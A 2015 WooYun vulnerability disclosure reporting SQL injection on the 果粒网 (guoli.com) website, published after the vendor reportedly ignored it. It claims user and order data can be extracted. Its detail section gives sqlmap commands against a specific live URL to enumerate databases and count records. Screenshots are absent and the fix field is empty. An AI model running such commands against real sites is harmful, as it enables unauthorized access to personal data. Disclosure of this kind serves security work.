
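Vulnerability Summary

Bug ID: wooyun-2015-0126798

Vulnerability title: SQL injection at a location on the 果粒网 main site

Vendor: 果粒网

Author: Jinone

Submitted: 2015-07-15 14:29

Fix time: 2015-08-29 14:30

Disclosed: 2015-08-29 14:30

Vulnerability type: Network design flaw / logic error

Severity: High

Self-assessed Rank: 15

Status: Unable to contact the vendor, or the vendor actively ignored the report

Vulnerability source: http://www.wooyun.org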


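Vulnerability Details

Disclosure status:

2015-07-15: Actively contacting the vendor and waiting for the vendor to claim the report; details not public
2015-08-29: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

123

Detailed description:

SQL injection at a location on 果粒网; information on 300,000 users plus data on the order of millions of records can be obtained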
Sqlmap -u "http://www.guoli.com/cy/index.php?&subject=00&longterm=2" --dbs

[Screenshot: 1.png]

Sqlmap -u "http://www.guoli.com/cy/index.php?&subject=00&longterm=2" --count

[Screenshot: 2.png]

So many.

[Screenshot: 3.png]


Too many; I won't run the rest.


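Proof of vulnerability:

[Screenshot: 1.png]

[Screenshot: 2.png]

[Screenshot: 3.png]

Too many.

Fix:

null

Copyright notice: when reposting, credit the source Jinone@WooYun (乌云)


Vulnerability Response

Vendor response:

Unable to contact the vendor, or the vendor actively refused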